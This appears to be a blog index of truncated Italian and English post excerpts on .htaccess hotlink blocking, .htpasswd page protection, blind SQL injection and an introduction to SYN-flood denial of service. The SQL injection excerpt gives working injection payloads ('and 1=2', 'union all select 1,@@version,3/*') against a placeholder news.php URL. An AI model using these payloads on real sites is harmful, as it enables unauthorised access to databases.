Gli hotlink (collegamento caldo) sono tutti quegli oggetti che non appartengono al dominio in cui questi vengono visualizzati o utilizzati.
Spesso lo stratagemma degli hotlink viene usato per visualizzare immagini di grosse dimensioni provenienti da altri siti web. Tale procedura comporta un forte sfruttamento del server in cui sono realmente memorizzate e un utilizzo praticamente nullo del server che contiene il sito web visualizzato.
Nel tutorial di oggi vedremo come prevenire gli hotlink con .htaccess.

 
RewriteEngine On
#Replace ?mysite\.com/ with your blog url
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?mysite\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
#Replace /images/nohotlink.jpg with your "don't hotlink" image url
RewriteRule .*\.(jpe?g|gif|bmp|png…

…

…

Se desiderate proteggere le vostre pagine/directory in modo sicuro, vi consigliamo di seguire questo semplice ma utile tutorial.

Step 1: Inserire il seguente codice all’interno del file .htaccess, e caricate il file/directory che desiderate proteggere (in questo esempio vogliamo proteggere la pagina “prova.html”).

 
AuthName "Restricted Area"
AuthType Basic
AuthUserFile /home/mysite/.htpasswd
AuthGroupFile /dev/null
<files prova.html>
require valid-user
</files>
 

Step 2: Salvate il seguente codice in un file chiamato .htpasswd, e caricatelo nello stesso percorso che avete specificato nella riga “AuthUserFile”. Esso contiene il vostro nome utente e password (criptata).
N.B. .htpasswd deve essere messo in una cartella non pubblica in modo da rimanere nascosto dagli occhi …

…

2. Blind SQL Injection

Blind injection is a little more complicated the classic injection but it can be done

I must mention, there is very good blind sql injection tutorial by xprog, so it’s not bad to read it

Let’s start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc…

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1 <— this is always true

and the page loads normally, that’s ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2 <— this is false

so if some text, picture or …

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try –
it’s a comment and it’s important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”

i didn’t see any paper covering this problem, so i must write it

what we need is …

…

…

…

Introduzione a DoS

Il Denial of Service (DoS) è un attacco che ha lo scopo di impedire ad un sistema di fornire in modo
regolare i servizi previsti, può mandare richieste al sistema-vittima prescelto fino al punto da
rendere il servizio inutilizzabile poichè non si hanno più risorse disponibili. Una delle tecniche
di attacco di tipo DOS è il SYN FLOODING che utilizza una debolezza nell’implementazione/configurazione
del protocollo di connessione TCP per cui prima di spiegare come viene effettuato l’attacco SYN Flooding
è necessario fare un breve ripasso delle nozioni base del protocollo TCP (Transmission Control Protocol).

Protocollo TCP
A livello TCP l’unità di trasferimento dei dati prende il nome …